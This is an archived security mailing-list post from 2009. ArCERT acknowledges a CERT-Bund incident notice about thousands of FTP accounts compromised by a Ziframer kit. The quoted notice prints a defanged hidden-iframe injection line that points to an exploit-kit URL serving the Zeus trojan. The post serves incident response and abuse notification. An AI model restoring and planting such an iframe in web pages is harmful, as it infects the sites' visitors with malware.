[nsp-sec] ACK: More compromised ftp accounts
Rodolfo Baader
rbaader at arcert.gov.ar
Fri Sep 4 14:20:10 EDT 2009
Hi!
ACK for AR ASNs: 7303, 10318, 10481, 10834, 11451, 11664, 16814, 27823, 27898
Notifications were sent to the abuse/noc departments.
R.
Thomas Hungenberg wrote:
> ----------- nsp-security Confidential --------
>
> Hi teams,
>
> Roman from abuse.ch came across a new Ziframer installation (see <http://www.abuse.ch/?p=1739>).
> It comes along with a list of 18245 ftp credentials.
> Many of the accounts were already included with the list of accounts I posted here on 2009-08-25
> (found along with another Iframer kit).
>
> Please find attached a sanitized list (pw removed) of 8169 compromised ftp accounts that are new.
> Format: ASN | IP | CC | ftp username | AS name
>
> Top 10 country codes:
>
> 2699 US
> 705 DE
> 592 RU
> 482 TR
> 424 FR
> 331 PL
> 329 CZ
> 310 HU
> 298 NL
> 222 EU
>
> The Iframer was configured to inject this line (remove 'XXX'):
> <ifrXXXame src="htXXXtp://seca.ws/forum/show.php" width="1" height="1" style="display:none;"></ifrXXXame>
>
> This URL leads to a Fragus exploit kit which currently drops a Zeus/Zbot trojan.
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________